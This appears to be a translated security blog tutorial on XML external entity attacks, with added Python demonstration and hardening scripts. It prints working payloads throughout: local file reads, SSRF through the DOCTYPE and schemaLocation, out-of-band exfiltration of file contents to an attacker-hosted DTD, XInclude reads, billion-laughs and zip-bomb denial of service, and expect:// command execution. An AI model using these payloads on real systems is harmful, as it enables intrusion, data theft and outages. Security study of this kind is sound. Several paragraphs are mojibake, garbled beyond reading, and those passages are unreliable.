XML, the Extensible Markup Language, was designed to transport and store data, and it turns up in many forms. Some of the features designed into XML, such as XML Schemas (schema documents following the XML Schema specification) and document type definitions (DTDs), are a source of security problems. Although they have been discussed in public for more than a decade, software keeps dying in droves to attacks aimed at XML.
0x00 Introduction to XML
XML was designed to transport and store data, and it appears in many forms, for example:
1. Document formats (OOXML, ODF, PDF, RSS, DOCX, ...)
2. Image formats (SVG, EXIF headers, ...)
3. Configuration files (any name, usually with an .xml extension)
4. Network protocols (WebDAV, CalDAV, XML-RPC, SOAP, REST, XMPP, SAML, XACML, ...)

The entity mechanism itself is easy to understand if you think of it as escaping: the predefined references and a custom reference such as &foo; are the same thing in principle, except that with the latter we define the replacement text ourselves, and it can be anything.

Take DTDs. A DTD can declare entities, which act as variables (or text macros) for use later in the DTD or in the XML document. Internal entities are declared in the DTD and carry their replacement text with them; the parser substitutes that text into the document wherever the entity is referenced. External entities instead point at an external resource, which may live on the local machine or on a remote host. While resolving an external entity the parser may speak any number of network protocols and services (DNS, FTP, HTTP, SMB, and so on), depending on what the URL specifies. External entities are useful for documents that must pull in content that changes over time, but attacks can happen during that resolution as well. They include:
1. Reading local files (which may contain sensitive data, e.g. /etc/shadow)
2. Memory corruption
3. Arbitrary code execution
4. Denial of service
This post summarises the XML attack techniques that have appeared over the years.
0x01 A first look at XML external entity attacks
File inclusion via external entities
The earliest XML attack to be described abuses external entity references to read arbitrary files:
```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE updateProfile [
  <!ENTITY file SYSTEM "file:///c:/windows/win.ini">
]>
<updateProfile>
  <firstname>Joe</firstname>
  <lastname>&file;</lastname>
  ...
</updateProfile>
```
This kind of read is limited, however, because the XML parser requires the referenced data to be well-formed. An example shows what well-formed means here:
```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE simpleDocument [
  <!ENTITY first "<my">
  <!ENTITY second "tag/>">
]>
<simpleDocument>&first;&second;</simpleDocument>
```
When this document is sent to the server it produces an error. Concatenated, the two replacement texts would form a perfectly closed tag, but the parser expands each entity at the point where it is referenced and requires each replacement text to be well-formed content on its own; "<my" by itself is not, so the parser aborts.
This restriction once made XXE look like a pale attack, because many of the files worth reading are not well-formed XML fragments. PHP source is the typical example: the recommended style opens a file with <?php and never closes the tag.
Worse, if the file you include is itself a complete XML document (a database connection configuration, say), the result looks like this:

When the database configuration is embedded inside the tag, most of its content shows up as ellipses and only the document's structure is visible. This is a property of the XML parser: the included file is parsed as markup, not as text, so its elements become elements of the host document and only the text nodes reach the application through the field it echoes.
URL invocation
One often overlooked corner of XML attacks is the use of URL handling, and some of its odd features, to enlarge the attack surface.
The XML specification does not require support for any particular URL scheme, yet the networking libraries underneath most platforms support nearly all of them.
Through URLs an attacker can make the host running the XML parser send malicious requests to third-party hosts,
i.e. server-side request forgery (SSRF). In theory, URL invocation can even be used to flood an internal network.

´ó²¿·ÖÈ˲»ÖªµÀµÄÊÇ£¬¼´Ê¹ÍⲿʵÌå±»½ûÓÃÁË£¬Ðí¶àxml parsers»¹ÊÇ»áÈ¥½âÎöÄÇЩURL¡£¾Ù¸öÀý×Ó£¬Ò»Ð©parsers»áÔÚÎĵµ¶¨Òå½×¶Î¶Ôurl·¢ÆðÇëÇó
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE roottag PUBLIC "-//VSR//PENTEST//EN" "http://internal/service?ssrf"> <roottag>Õâ²»ÊÇʵÌå¹¥»÷£¡</roottag> |
³ýÁËÍⲿʵÌåºÍ»ùÓÚDOCTYPEµÄSSRF¹¥»÷Ö®Í⣬XML SchemaÌṩÁËÁ½¸öÔÚʵÀýÎĵµÖÐʹÓõÄÌØÊâÊôÐÔ£¬ÓÃÓÚÖ¸³öģʽÎĵµµÄλÖá£ÕâÁ½¸öÊôÐÔÊÇ£ºxsi:schemaLocationºÍxsi:noNamespaceSchemaLocation£¬Ç°ÕßÓÃÓÚÉùÃ÷ÁËÄ¿±êÃû³Æ¿Õ¼äµÄģʽÎĵµ£¬ºóÕßÓÃÓÚûÓÐÄ¿±êÃû³Æ¿Õ¼äµÄģʽÎĵµ£¬ËüÃÇͨ³£ÔÚʵÀýÎĵµÖÐʹÓá£
```xml
<roottag xmlns="http://schema/namespace/primary"
         xmlns:secondaryns="http://schema/namespace/secondary"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://schema/namespace/primary http://location/of/remote/schema/primary.xsd
                             http://schema/namespace/secondary http://location/of/remote/schema/secondary.xsd">
  <p>
    <secondaryns:s> ... </secondaryns:s>
  </p>
</roottag>
```
In this example everything carrying the secondaryns: prefix is governed by the namespace bound in xmlns:secondaryns. Because a DOCTYPE cannot appear in the middle of a document, xsi:schemaLocation (here http://location/of/remote/schema/primary.xsd) lets us trigger SSRF even when we only control part of the document. (This requires certain parser settings to be switched on; we have not tested every XML parser thoroughly enough to know what each environment needs for the SSRF to fire, so this remains an open question, and interested WooYun members are welcome to compare notes.)
0x02 Attacks once parameter entities enter the picture
Once our malicious XML is parsed successfully we may still face two problems:
1. The data is not well-formed, so embedding it fails (for example a PHP file that contains only an opening <?php tag).
2. The server restricts what it returns, so the data never comes back.
Parameter entities solve both.
Parameter entities begin with % instead of &. Two rules govern their use:
1. Parameter entities can only be referenced inside the DTD, never in the document body.
2. Inside the internal DTD subset they can only be referenced between declarations; a reference inside a markup declaration (for instance inside another entity's value) is a well-formedness error. An external DTD has no such restriction, which is why the payloads below pull in a DTD from a server we control.
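As an added example (this is not code from the original post, nor from any project it describes), the following Python script runs the payload shapes from 0x01 and the two rules above through Python's expat-based xml.sax parser, once in the vulnerable configuration and once with external entity processing switched off. It uses only the standard library; the secret file and the external DTD are constructed in a temporary directory, and local absolute paths stand in for the page's file:/// and http:// URLs so that everything runs offline. The DOCTYPE probe keeps the page's http://internal/service?ssrf identifier, but the resolver answers it with an empty stream after recording the request.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax import SAXParseException
from xml.sax.handler import ContentHandler, EntityResolver, feature_external_ges
from xml.sax.xmlreader import InputSource


class Collector(ContentHandler):
    """Gathers character data exactly as an application reading the document would."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


class RecordingResolver(EntityResolver):
    """Records every external identifier the parser asks for.  Local paths are
    served as-is (the vulnerable behaviour); anything that looks like a network
    URL gets an empty stream, so the script stays offline while still showing
    that the parser tried to reach out."""

    def __init__(self):
        self.requests = []

    def resolveEntity(self, publicId, systemId):
        self.requests.append(systemId)
        if systemId.startswith(("http://", "https://", "ftp://")):
            empty = InputSource()
            empty.setCharacterStream(io.StringIO(""))
            return empty
        return systemId


def parse(xml_bytes, allow_external=False):
    """Return (text handed to the application, external identifiers requested).

    allow_external=True is the vulnerable configuration: external general and
    parameter entities, and the DOCTYPE's external subset, are all fetched
    through the resolver.  False (Python's default since 3.7.1) skips them."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, allow_external)
    handler, resolver = Collector(), RecordingResolver()
    parser.setContentHandler(handler)
    parser.setEntityResolver(resolver)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.parts), resolver.requests


def outcome(xml_bytes, allow_external=False):
    """Text the application receives, or 'rejected' if the parser refuses the document."""
    try:
        return parse(xml_bytes, allow_external)[0]
    except SAXParseException:
        return "rejected"


def demo():
    """Run the payload shapes from the post against both configurations."""
    with tempfile.TemporaryDirectory() as workdir:
        secret = os.path.join(workdir, "secret.txt")      # constructed stand-in for win.ini
        with open(secret, "w") as f:
            f.write("hunter2")                            # no trailing newline, keeps results exact
        dtd = os.path.join(workdir, "evil.dtd")           # constructed stand-in for the remote DTD
        with open(dtd, "w") as f:
            f.write('<!ENTITY % s "hello from the external DTD">\n<!ENTITY e "%s;">\n')

        # 0x01: an external general entity pulls a local file into <lastname>.
        xxe = f'''<?xml version="1.0"?>
<!DOCTYPE updateProfile [ <!ENTITY file SYSTEM "{secret}"> ]>
<updateProfile><firstname>Joe</firstname><lastname>&file;</lastname></updateProfile>'''.encode()
        # 0x01: each replacement text must be well-formed on its own.
        split = b'''<?xml version="1.0"?>
<!DOCTYPE d [ <!ENTITY first "<my"> <!ENTITY second "tag/>"> ]>
<d>&first;&second;</d>'''
        # URL invocation: nothing references an entity, the DOCTYPE alone triggers a fetch.
        doctype = b'''<?xml version="1.0"?>
<!DOCTYPE roottag PUBLIC "-//VSR//PENTEST//EN" "http://internal/service?ssrf">
<roottag>This is not an entity attack!</roottag>'''
        # 0x02, rule 2: a %ref; inside a declaration is illegal in the internal subset ...
        pe_internal = b'''<?xml version="1.0"?>
<!DOCTYPE d [ <!ENTITY % s "hello"> <!ENTITY e "%s;"> ]>
<d>&e;</d>'''
        # ... but legal in an external DTD pulled in with %dtd; between declarations.
        pe_external = f'''<?xml version="1.0"?>
<!DOCTYPE d [ <!ENTITY % dtd SYSTEM "{dtd}"> %dtd; ]>
<d>&e;</d>'''.encode()

        return {
            "xxe_vulnerable": outcome(xxe, True),                    # 'Joehunter2'
            "xxe_hardened": outcome(xxe),                            # 'Joe': the entity is skipped
            "split_tag": outcome(split),                             # 'rejected'
            "doctype_requests_vulnerable": parse(doctype, True)[1],  # ['http://internal/service?ssrf']
            "doctype_requests_hardened": parse(doctype)[1],          # []
            "pe_internal_subset": outcome(pe_internal),              # 'rejected'
            "pe_external_dtd": outcome(pe_external, True),           # 'hello from the external DTD'
            "pe_external_dtd_hardened": outcome(pe_external),        # ''
        }
```

Call demo() and compare the two halves of the result: the hardened configuration never consults the resolver, so the DOCTYPE probe and the %dtd; fetch simply do not happen, and the external general entity is dropped rather than expanded. The CDATA-wrapping and out-of-band variants in the next sections build on the same %dtd; mechanism shown in the last two cases; they are not reproduced here because one needs a listener and the other depends on how the parser handles external parameter entities inside entity values, which this script does not exercise.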
Putting CDATA escaping to work
A CDATA section starts with <![CDATA[ and ends with ]]>. Everything in between is passed through by the XML parser as literal character data; it has no meaning other than being a string. So can we build a document that wraps the file in a CDATA section before handing it back?
```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
  <!ENTITY % start "<![CDATA[">
  <!ENTITY % goodies SYSTEM "file:///etc/fstab">
  <!ENTITY % end "]]>">
  <!ENTITY % dtd SYSTEM "http://evil.example.com/combine.dtd">
  %dtd;
]>
<roottag>&all;</roottag>
```
combine.dtd contains:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY all "%start;%goodies;%end;">
```
Earlier we saw that a parser rejects a general entity whose replacement text is not well-formed, so why does %start; work here? Because parameter entities are expanded inside the DTD, where an entity value only has to be legal literal text, not well-formed content. The three references are stitched together into the value of the general entity all, which ends up as <![CDATA[ followed by the file contents followed by ]]>: a well-formed CDATA section whatever the file contains (unless the file itself contains the sequence ]]>). Only when &all; is expanded in the document body does the well-formedness check apply, and by then it passes, so the parser hands the application the whole file as character data.
This way we can read all of the data (base64-encoding it also works).
Out-of-band data to bypass the lack of output
Another use of parameter entities is out-of-band exfiltration.
With parameter entities we can send the file we want to read to our own server over some protocol (HTTP, FTP, and so on) and then recover it from the server logs.
The document can be constructed like this:
```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
  <!ENTITY % file SYSTEM "file:///c:/windows/win.ini">
  <!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">
  %dtd;
]>
<roottag>&send;</roottag>
```
Then, on http://example.com/, which we control, place the following DTD:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://example.com/?%file;'>">
%all;
```
The sequence is: the parser fetches evil.dtd, expands %file; into the value of %all;, evaluates %all; so that the entity send is declared, and finally resolves &send; by requesting http://example.com/?(file contents), which lands the data in our web server log. Because the file contents become part of a URL, newlines and other characters that are illegal in a URL make the request fail, so single-line targets work best.

XXE: the less obvious tricks
File inclusion via XInclude
XInclude offers a more convenient way to retrieve data (no more worrying that incomplete data makes the parser throw an error), and the parse attribute lets us force the included file to be treated as plain text:
```xml
<root xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include href="file:///etc/fstab" parse="text"/>
</root>
```
XInclude has to be enabled explicitly, though; in our tests every XML parser had it switched off by default.
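Python's xml.etree shows the "off by default" point in practice, because it only processes xi:include when the application asks for it. As an added example (not code from the post), the script below runs the page's parse="text" include first through ElementTree's default loader, which opens whatever href the document names, and then through a loader restricted to a directory the application owns. The secret file, the fragments directory and the footer.txt name are constructed here for the demonstration and stand in for /etc/fstab.

```python
import os
import tempfile
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude

XI_NS = "http://www.w3.org/2001/XInclude"


def restricted_loader(allowed_dir):
    """Build an XInclude loader that serves only files inside allowed_dir.

    allowed_dir is an assumption for this example: a directory of fragments the
    application owns.  Absolute hrefs and ../ escapes resolve outside it and are refused."""
    allowed_dir = os.path.realpath(allowed_dir)

    def loader(href, parse, encoding=None):
        # os.path.join discards allowed_dir when href is absolute; realpath then
        # resolves symlinks and ../ so the containment check sees the real target.
        target = os.path.realpath(os.path.join(allowed_dir, href))
        if os.path.commonpath([allowed_dir, target]) != allowed_dir:
            raise PermissionError(f"xi:include outside {allowed_dir}: {href}")
        return ElementInclude.default_loader(target, parse, encoding)

    return loader


def include_text(xml_text, loader=None):
    """Parse xml_text, process its xi:include elements and return the root's text.

    ElementTree never processes XInclude on its own; the application opts in by
    calling ElementInclude.include.  loader=None selects the default loader,
    which opens any href the document names."""
    root = ET.fromstring(xml_text)
    ElementInclude.include(root, loader=loader)
    return root.text or ""


def demo():
    """Constructed inputs: a 'secret' file outside the fragments directory and a
    legitimate fragment inside it."""
    with tempfile.TemporaryDirectory() as workdir:
        secret = os.path.join(workdir, "secret.txt")
        with open(secret, "w") as f:
            f.write("hunter2")
        fragments = os.path.join(workdir, "fragments")
        os.mkdir(fragments)
        with open(os.path.join(fragments, "footer.txt"), "w") as f:
            f.write("footer")

        attack = (f'<root xmlns:xi="{XI_NS}">'
                  f'<xi:include href="{secret}" parse="text"/></root>')
        legit = (f'<root xmlns:xi="{XI_NS}">'
                 '<xi:include href="footer.txt" parse="text"/></root>')

        results = {"default_loader": include_text(attack)}           # 'hunter2'
        try:
            include_text(attack, restricted_loader(fragments))
            results["restricted_loader"] = "included"
        except PermissionError:
            results["restricted_loader"] = "rejected"                # 'rejected'
        results["restricted_loader_legit"] = include_text(legit, restricted_loader(fragments))  # 'footer'
        return results
```

The restricted loader is the shape of fix to reach for when an application genuinely needs XInclude: keep the feature, but decide in code which files it may reach, rather than trusting the href in attacker-controlled input.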
Denial of service
XXE can also be used to mount denial of service attacks.
In the nested references below, each level expands to ten copies of the level beneath it, so the size grows exponentially from the bottom up:
```xml
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
```
»ØÒäһϽâÎö¹ý³Ì£¬µ±XML´¦ÀíÆ÷ÔØÈëÕâ¸öÎĵµµÄʱºò£¬Ëü»á°üº¬¸ùÔªËØ£¬¶øÀïÃæ¶¨ÒåÁËʵÌå&lol9
£¬¶ø19ʵÌåÀ©Õ¹³ÉÁ˰üº¬ÁË¡°&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;¡±Õâ¸ö×Ö·û´®¡£
Èç´ËµÝ¹éÉÏÈ¥£¬Ñ¹ÈëÄÚ´æµÄ¶«Î÷³ÊÖ¸ÊýÔö³¤£¬ÊµÑé·¢ÏÖ£¬Ò»¸öСÓÚ1KBµÄXML¹¥»÷payloadÄÜÏûºÄ3GBµÄÄÚ´æ¡£
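As an added example (not from the original post), here is a standard-library Python estimator that works out how large a document's entity expansion would become before a full parser is asked to perform it. It reconstructs the payload above programmatically, so billion_laughs() with its default nine levels is the page's payload and billion_laughs(10) is the canonical ten-level one. The 10 MiB ceiling and the regex-based scan of the internal subset are assumptions made for illustration; the scan ignores external entities entirely, since those are the XXE problem rather than the expansion problem.

```python
import re

# Internal-subset scanner.  It handles only what the payload above uses:
# <!DOCTYPE ... [ ... ]> with general entities declared as literals.
INTERNAL_SUBSET = re.compile(r"<!DOCTYPE[^\[>]*\[(.*?)\]\s*>", re.S)
ENTITY_DECL = re.compile(r"""<!ENTITY\s+(?!%)(\w+)\s+(?:"([^"]*)"|'([^']*)')\s*>""")
ENTITY_REF = re.compile(r"&(\w+);")
PREDEFINED = {"lt": "<", "gt": ">", "amp": "&", "apos": "'", "quot": '"'}


def internal_entities(xml_text):
    """Map general entity name -> literal replacement text from the internal subset.
    External (SYSTEM/PUBLIC) entities have no literal and are ignored here."""
    m = INTERNAL_SUBSET.search(xml_text)
    if not m:
        return {}
    return {name: dq or sq for name, dq, sq in ENTITY_DECL.findall(m.group(1))}


def expansion_size(entities, name, memo, stack=()):
    """Number of characters &name; expands to, computed bottom-up with memoisation
    so the bomb is never materialised.  A cycle is a well-formedness error
    (WFC: No Recursion) and is reported instead of looping."""
    if name in memo:
        return memo[name]
    if name in stack:
        raise ValueError(f"recursive entity reference through &{name};")
    value = entities.get(name)
    if value is None:                 # undefined or external: the reference stays as written
        return len(name) + 2
    size, pos = 0, 0
    for ref in ENTITY_REF.finditer(value):
        size += ref.start() - pos
        size += expansion_size(entities, ref.group(1), memo, stack + (name,))
        pos = ref.end()
    size += len(value) - pos
    memo[name] = size
    return size


def document_expansion_size(xml_text):
    """Total size of every entity reference in the document body once expanded."""
    entities = {**PREDEFINED, **internal_entities(xml_text)}
    m = INTERNAL_SUBSET.search(xml_text)
    body = xml_text[m.end():] if m else xml_text
    memo = {}
    return sum(expansion_size(entities, ref.group(1), memo) for ref in ENTITY_REF.finditer(body))


MAX_EXPANSION = 10 * 1024 * 1024   # assumption: a 10 MiB ceiling for this service


def is_safe_to_parse(xml_text):
    return document_expansion_size(xml_text) <= MAX_EXPANSION


def billion_laughs(levels=9):
    """Reconstruct the payload from the post: lol, then lol2..lol<levels>, each
    ten references to the level below.  levels=9 is the page's payload."""
    names = ["lol"] + [f"lol{i}" for i in range(2, levels + 1)]
    decls = ['<!ENTITY lol "lol">']
    for below, above in zip(names, names[1:]):
        decls.append('<!ENTITY %s "%s">' % (above, ("&%s;" % below) * 10))
    return '<?xml version="1.0"?>\n<!DOCTYPE lolz [\n%s\n]>\n<lolz>&%s;</lolz>' % (
        "\n".join(decls), names[-1])


# Constructed comparison inputs: a harmless macro and a declaration cycle.
BENIGN = '<!DOCTYPE note [ <!ENTITY company "ACME Corp"> ]>\n<note>&company; thanks &company;</note>'
RECURSIVE = '<!DOCTYPE d [ <!ENTITY a "&b;"> <!ENTITY b "&a;"> ]>\n<d>&a;</d>'
```

document_expansion_size(billion_laughs()) returns 300,000,000 and billion_laughs(10) returns 3,000,000,000, which is where the two figures in the text come from. A pre-filter like this is cheap, but it is not a substitute for a limit inside the parser: libexpat 2.4 and later caps the amplification factor of entity expansion once a document passes a size threshold, and libxml2 has its own entity-size limits. The estimator's job is to reject the obvious bomb before any of that work starts.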
Attacks and limitations in specific environments
Java and Xerces
The default XML parser in Oracle's Java Runtime Environment is Xerces, an Apache project. Xerces and Java provide a series of features that in turn lead to some serious security problems. All of the attacks described above (DOCTYPE-based SSRF, file reading, out-of-band data through parameter entities) work out of the box under Java's default configuration. Java/Xerces also supports XInclude,
but it has to be enabled with setXIncludeAware(true) and setNamespaceAware(true).
Java supports a wide range of URL schemes, and two of them deserve special attention.
Surprisingly, Java's file scheme can be used to list directories: on Linux, for instance, "file:///" returns everything under /.
The jar scheme, as in jar:http://host/application.jar!/file/within/the/zip, makes the server first download the archive, then unpack the package named between jar: and !, and finally extract the file named after the !. From the attacker's point of view one can craft archives with extreme compression ratios (1000:1, say); such zip bombs can be used against anti-virus systems or to exhaust the target's disk and memory. Note that jar: URLs work on any Java/Xerces system that accepts a DOCTYPE declaration, so the attack remains possible even when external entities are turned off.
RCE with PHP and expect
Unfortunately the expect extension is not installed by default, but where it is, an XXE vulnerability becomes arbitrary command execution:
```xml
<!DOCTYPE root [<!ENTITY cmd SYSTEM "expect://id">]>
<dir>
  <file>&cmd;</file>
</dir>
```
The response then contains:
```xml
<file>uid=501(Apple) gid=20(staff) groups=20(staff),501(access_bpf),
12(everyone),61(localaccounts),79(_appserverusr),80(admin),
81(_appserveradm),98(_lpadmin),401(com.apple.sharepoint.group.1),
33(_appstore),100(_lpoperator),204(_developer),
398(com.apple.access_screensharing),399(com.apple.access_ssh)</file>
```
XML injection
This has little to do with XXE, but since this post is about XML security it belongs here too.
In PHP, $GLOBALS["HTTP_RAW_POST_DATA"] is not escaped; once a program extracts data through an entity and passes it straight into MySQL, the result is SQL injection.
A case in point:
WooYun: PHPYUN latest version, XML injection and SQL injection yield the administrator account (bypassing every defence)
0x03 Summary
XXE attacks keep being overlooked.
Developers tend to say:
The threat is small...
Disabling entities avoids it completely...
What is an XML entity attack?
Yet, as the attacks above show, XML entity attacks have produced plenty of threats that developers never expected.